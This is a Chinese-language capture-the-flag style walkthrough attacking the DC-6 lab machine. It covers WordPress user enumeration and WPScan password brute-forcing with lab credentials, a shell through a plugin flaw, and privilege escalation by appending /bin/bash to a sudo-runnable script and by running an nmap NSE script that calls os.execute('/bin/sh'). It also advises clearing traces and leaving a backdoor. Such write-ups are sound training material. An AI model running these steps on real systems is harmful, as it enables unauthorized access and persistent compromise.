DC-6 渗透测试

DC-6渗透测试

0x00实验环境

靶机:DC-6,IP地址:192.168.8.141

测试机:Kali,IP地址:192.168.8.140;

0x01实验流程

信息收集——主机发现、端口扫描

渗透测试

0x02实验步骤

  1. 主机发现

DC-6 渗透测试_第1张图片

  1. 端口及服务扫描

DC-6 渗透测试_第2张图片

DC-6 渗透测试_第3张图片

  1. 访问web端

DC-6 渗透测试_第4张图片

考虑需要添加hosts记录

DC-6 渗透测试_第5张图片

正常访问

DC-6 渗透测试_第6张图片

 

  1. Wpscan扫描站点

wpscan --url http://wordy/ -e u 暴力枚举用户名

DC-6 渗透测试_第7张图片

我们现在得到用户名,再根据提示得到密码字典

DC-6 渗透测试_第8张图片

DC-6 渗透测试_第9张图片

DC-6 渗透测试_第10张图片

更名为dc6password.txt

暴力破解用户名密码得到

(wpscan --url http://wordy/ -U dc6user.txt -P dc6password.txt)

Mark : helpdesk01

登录wordpress后台

DC-6 渗透测试_第11张图片

  1. 在后台发现activity monitor,查找相关漏洞

DC-6 渗透测试_第12张图片

 

 

DC-6 渗透测试_第13张图片

修改html中的内容

kali开启web服务并访问该html,同时开启nc监听

DC-6 渗透测试_第14张图片

DC-6 渗透测试_第15张图片

DC-6 渗透测试_第16张图片

成功getshell

  1. python -c 'import pty;pty.spawn("/bin/bash")'开启终端

切换到mark目录下查看文件

DC-6 渗透测试_第17张图片

得到graham - GSo7isUM1D4

Ssh登录graham

DC-6 渗透测试_第18张图片

在jens的用户目录下发现shell脚本,并且此脚本有执行权限

DC-6 渗透测试_第19张图片

此脚本在当前用户下有读写权限,修改脚本内容,在末尾增加/bin/bash,当执行时可以获得jens的shell

echo '/bin/bash'  >> backups.sh

sudo -u jens ./backups.sh

成功切换到jens用户

DC-6 渗透测试_第20张图片

  1. 查看jens可以使用的root权限命令

Nmap

nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权

写入:

echo 'os.execute("/bin/sh")' >get_root.nse

sudo nmap --script=/home/jens/get_root.nse

DC-6 渗透测试_第21张图片

成功提权

  1. 清理痕迹,留下后门如一句话之类的

 

 

 

 

总结:

  1. 由于是wordpress站点,所以首先扫描用户
  2. 再根据提示生成针对性字典,爆破出用户名密码
  3. 登录wp后台,寻找漏洞并利用以getshell
  4. 再getshell以后仔细发现有用文件以及可用命令,用以提升权限

你可能感兴趣的:(渗透测试,靶机,Linux)